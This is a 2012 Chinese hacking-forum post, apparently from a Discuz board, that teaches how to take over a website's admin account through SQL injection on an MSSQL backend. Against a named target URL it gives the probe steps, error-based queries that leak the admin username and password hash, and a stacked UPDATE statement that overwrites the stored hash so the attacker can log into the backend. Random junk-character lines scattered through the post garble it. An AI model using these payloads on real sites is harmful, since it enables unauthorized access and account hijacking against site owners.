中国网络渗透测试联盟
标题:
SQL注入直接修改管理员密码的MD5值
[打印本页]
作者:
admin
时间:
2012-9-13 17:55
标题:
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
7 a! S0 S9 J5 b& a. T
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
5 x3 I: |7 M0 K, B8 A( [
测试如下:
9 h( g+ t& {- J* h/ t2 j
http://www.tmdsb.com/news.asp?id=121
( J2 a1 z0 x' [2 w* p0 q
在地址后输入单引号,显示
# U( ?" ]; G& u. F, z" }- Y& n
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
2 R2 }% R" p5 r7 A' Q# i9 F+ E
字符串 ’’’ 之前有未闭合的引号
. s! B' v! A9 t2 ~) }9 u7 s$ ]
/news/tmdws.asp,行63
y% k0 j4 L" u: w. x8 ^7 k. U, S
说明没有过滤单引号且数据库是MSSQL.
3 w) ^3 _; A- [& Y$ w
and 1=1正常。and 1=2出错。肯定存在注入
" ?; Y- A7 Q3 s8 ]4 ?6 u
接着输入
9 M* J# ^7 T+ _: e+ G6 J
http://www.tmdsb.com/news.asp?id=1
or admin_user in (select id from admin)
7 ]. r6 L% e/ @6 N; D8 ~/ Z" C8 y9 W
得到帐号为:admin
& h( H: A4 U; {0 U; ]1 m+ Q7 d
http://www.tmdsb.com/news.asp?id=121
or admin_password in (select id from admin)
8 A' s+ V& h& m& F
得到密码为:a4716077c2ba075c
|6 r. V0 k1 [/ x! [& W
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
; ^4 E, p5 @" m6 F! O0 |3 Z* E
命令如下 :
$ W3 d" m% }* m% x
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
' E- \- ~: O. {: @3 u% T
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
作者:
angel
时间:
2012-9-14 16:22
没法说 一个字牛
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2